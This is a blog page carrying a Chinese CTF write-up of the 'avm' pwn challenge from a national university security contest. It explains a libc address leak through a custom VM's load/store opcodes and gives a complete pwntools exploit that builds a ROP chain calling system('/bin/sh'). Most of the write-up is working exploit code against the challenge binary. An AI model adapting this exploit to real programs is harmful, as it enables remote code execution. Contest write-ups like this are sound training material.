<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>WP&#39; | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="第十八届全国大学生信息安全竞赛暨第二届“长城杯”铁人三项赛初赛-pwn-avm WP当时没做出来，卡的点主要是以为找到和libc_base距离固定的地址，实际上不固定，导致本地时不时能跑通，远程始终失败。 断点设置在((void (__fastcall *)(_QWORD *, _BYTE *))funcs_1AAD[v2])(a1, s);即b *$rebase(0x1aad)，这样子方便确定每">
<meta property="og:type" content="article">
<meta property="og:title" content="WP&#39;">
<meta property="og:url" content="http://example.com/2025/01/17/WP/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="第十八届全国大学生信息安全竞赛暨第二届“长城杯”铁人三项赛初赛-pwn-avm WP当时没做出来，卡的点主要是以为找到和libc_base距离固定的地址，实际上不固定，导致本地时不时能跑通，远程始终失败。 断点设置在((void (__fastcall *)(_QWORD *, _BYTE *))funcs_1AAD[v2])(a1, s);即b *$rebase(0x1aad)，这样子方便确定每">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-01-17T06:47:53.000Z">
<meta property="article:modified_time" content="2025-01-17T06:48:34.331Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-WP" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2025/01/17/WP/" class="article-date">
  <time class="dt-published" datetime="2025-01-17T06:47:53.000Z" itemprop="datePublished">2025-01-17</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      WP&#39;
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="第十八届全国大学生信息安全竞赛暨第二届“长城杯”铁人三项赛初赛-pwn-avm-WP"><a href="#第十八届全国大学生信息安全竞赛暨第二届“长城杯”铁人三项赛初赛-pwn-avm-WP" class="headerlink" title="第十八届全国大学生信息安全竞赛暨第二届“长城杯”铁人三项赛初赛-pwn-avm WP"></a>第十八届全国大学生信息安全竞赛暨第二届“长城杯”铁人三项赛初赛-pwn-avm WP</h1><p>当时没做出来，卡的点主要是以为找到和libc_base距离固定的地址，实际上不固定，导致本地时不时能跑通，远程始终失败。</p>
<p>断点设置在<code>((void (__fastcall *)(_QWORD *, _BYTE *))funcs_1AAD[v2])(a1, s);</code>即<code>b *$rebase(0x1aad)</code>，这样子方便确定每一次操作执行前（后<code>b *$rebase(0x1aaf)</code>）的状态。</p>
<p>试了许多可能与libc_base距离相同的地址，但是都失败了，看到了一个有与<code>__libc_start_main</code>距离相同的地址，试了一下，果然距离相同。然后是偏移。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">04:0020│ rdx rsi 0x7fff332d3f20 ◂— 0</span><br><span class="line">1bf:0df8│+cc8     0x7fff332d4cf8 —▸ 0x7f9c43029e40 (__libc_start_main+128) ◂— mov r15, qword ptr [rip + 0x1f0159]</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">load(<span class="number">1</span>, <span class="number">0xd38</span>, <span class="number">4</span>)</span><br><span class="line"><span class="comment"># 4:(__libc_start_main+128)</span></span><br><span class="line">load(<span class="number">1</span>, <span class="number">0x160</span>, <span class="number">5</span>)</span><br><span class="line"><span class="comment"># 5:0x29d90</span></span><br><span class="line">sub(<span class="number">4</span>, <span class="number">5</span>, <span class="number">6</span>)</span><br><span class="line"><span class="comment"># 6:libc_base</span></span><br><span class="line">load(<span class="number">1</span>, <span class="number">0x168</span>, <span class="number">7</span>)</span><br><span class="line"><span class="comment"># 7:0x2a3e5[pop rdi]</span></span><br><span class="line">add(<span class="number">6</span>, <span class="number">7</span>, <span class="number">8</span>)</span><br><span class="line"><span class="comment"># 8:libc_rdi</span></span><br><span class="line">load(<span class="number">1</span>, <span class="number">0x170</span>, <span class="number">9</span>)</span><br><span class="line"><span class="comment"># 9:next(libc.search(b&#x27;/bin/sh&#x27;))</span></span><br><span class="line">add(<span class="number">6</span>, <span class="number">9</span>, <span class="number">10</span>)</span><br><span class="line"><span class="comment"># 10:libc_binsh</span></span><br><span class="line">load(<span class="number">1</span>, <span class="number">0x178</span>, <span class="number">11</span>)</span><br><span class="line"><span class="comment"># 11:ret</span></span><br><span class="line">add(<span class="number">6</span>, <span class="number">11</span>, <span class="number">12</span>)</span><br><span class="line"><span class="comment"># 12:libc_ret</span></span><br><span class="line">load(<span class="number">1</span>, <span class="number">0x180</span>, <span class="number">13</span>)</span><br><span class="line"><span class="comment"># 13:system</span></span><br><span class="line">add(<span class="number">6</span>, <span class="number">13</span>, <span class="number">14</span>)</span><br><span class="line"><span class="comment"># 14:libc_system</span></span><br><span class="line">store(<span class="number">1</span>, <span class="number">0x118</span>, <span class="number">8</span>)</span><br><span class="line">store(<span class="number">1</span>, <span class="number">0x120</span>, <span class="number">10</span>)</span><br><span class="line">store(<span class="number">1</span>, <span class="number">0x128</span>, <span class="number">12</span>)</span><br><span class="line">store(<span class="number">1</span>, <span class="number">0x130</span>, <span class="number">14</span>)</span><br><span class="line"><span class="comment"># ROP链：libc_rdi-&gt;libc_base-&gt;libc_ret(为了对齐)-&gt;libc_system</span></span><br><span class="line">p32(<span class="number">0</span>)</span><br><span class="line">p64(libc_start_main)</span><br><span class="line">p64(pop_rdi)</span><br><span class="line">p64(binsh)</span><br><span class="line">p64(ret)</span><br><span class="line">p64(system)</span><br></pre></td></tr></table></figure>

<h3 id="完整的exp（本地能稳定跑通）"><a href="#完整的exp（本地能稳定跑通）" class="headerlink" title="完整的exp（本地能稳定跑通）"></a>完整的exp（本地能稳定跑通）</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">io = process(<span class="string">&quot;/home/ben/Desktop/CISCN2024/avm/pwn&quot;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;/home/ben/Desktop/CISCN2024/avm/libc.so.6&quot;</span>)</span><br><span class="line">libc_start_main = <span class="number">0x29d90</span></span><br><span class="line">pop_rdi = <span class="number">0x2a3e5</span></span><br><span class="line">ret = <span class="number">0x29139</span></span><br><span class="line">system = <span class="number">0x50d70</span></span><br><span class="line">binsh = <span class="built_in">next</span>(libc.search(<span class="string">b&#x27;/bin/sh&#x27;</span>))</span><br><span class="line">gdb.attach(io,<span class="string">&quot;b *$rebase(0x1aad)&quot;</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">operation</span>(<span class="params">opcode, i, j, k</span>):</span><br><span class="line">    <span class="keyword">return</span> p32((opcode &lt;&lt; <span class="number">28</span>) + (i &lt;&lt; <span class="number">5</span>) + (j &lt;&lt; <span class="number">16</span>) + k)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">i, j, k</span>):</span><br><span class="line">    <span class="keyword">return</span> operation(<span class="number">1</span>, i, j, k)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">sub</span>(<span class="params">i, j, k</span>):</span><br><span class="line">    <span class="keyword">return</span> operation(<span class="number">2</span>, i, j, k)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">store</span>(<span class="params">i, j, k</span>):</span><br><span class="line">    <span class="keyword">return</span> operation(<span class="number">9</span>, i, j, k)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">load</span>(<span class="params">i, j, k</span>):</span><br><span class="line">    <span class="keyword">return</span> operation(<span class="number">10</span>, i, j, k)</span><br><span class="line"> </span><br><span class="line">opcode = load(<span class="number">1</span>, <span class="number">0xd38</span>, <span class="number">4</span>) + load(<span class="number">1</span>, <span class="number">0x160</span>, <span class="number">5</span>) + \</span><br><span class="line">         sub(<span class="number">4</span>, <span class="number">5</span>, <span class="number">6</span>) + load(<span class="number">1</span>, <span class="number">0x168</span>, <span class="number">7</span>) + \</span><br><span class="line">         add(<span class="number">6</span>, <span class="number">7</span>, <span class="number">8</span>) + load(<span class="number">1</span>, <span class="number">0x170</span>, <span class="number">9</span>) + \</span><br><span class="line">         add(<span class="number">6</span>, <span class="number">9</span>, <span class="number">10</span>) + load(<span class="number">1</span>, <span class="number">0x178</span>, <span class="number">11</span>) + \</span><br><span class="line">         add(<span class="number">6</span>, <span class="number">11</span>, <span class="number">12</span>) + load(<span class="number">1</span>, <span class="number">0x180</span>, <span class="number">13</span>) + \</span><br><span class="line">         add(<span class="number">6</span>, <span class="number">13</span>, <span class="number">14</span>) + store(<span class="number">1</span>, <span class="number">0x118</span>, <span class="number">8</span>) + \</span><br><span class="line">         store(<span class="number">1</span>, <span class="number">0x120</span>, <span class="number">10</span>) + store(<span class="number">1</span>, <span class="number">0x128</span>, <span class="number">12</span>) + \</span><br><span class="line">         store(<span class="number">1</span>, <span class="number">0x130</span>, <span class="number">14</span>) + p32(<span class="number">0</span>) + \</span><br><span class="line">         p64(libc_start_main) + p64(pop_rdi) + \</span><br><span class="line">         p64(binsh) + p64(ret) + p64(system)</span><br><span class="line"> </span><br><span class="line">io.send(opcode)</span><br><span class="line">io.recvuntil(<span class="string">b&#x27;opcode: Unsupported instruction\n&#x27;</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>


      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2025/01/17/WP/" data-id="cm60ejkqc0002bwbp9wk0ep3v" data-title="WP&#39;" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2025/01/06/fix-pwn/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">fix-pwn</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/01/">January 2025</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/01/17/WP/">WP&#39;</a>
          </li>
        
          <li>
            <a href="/2025/01/06/fix-pwn/">fix-pwn</a>
          </li>
        
          <li>
            <a href="/2025/01/03/Hello/">&#39;Hello&#39;</a>
          </li>
        
          <li>
            <a href="/2025/01/03/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2025 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>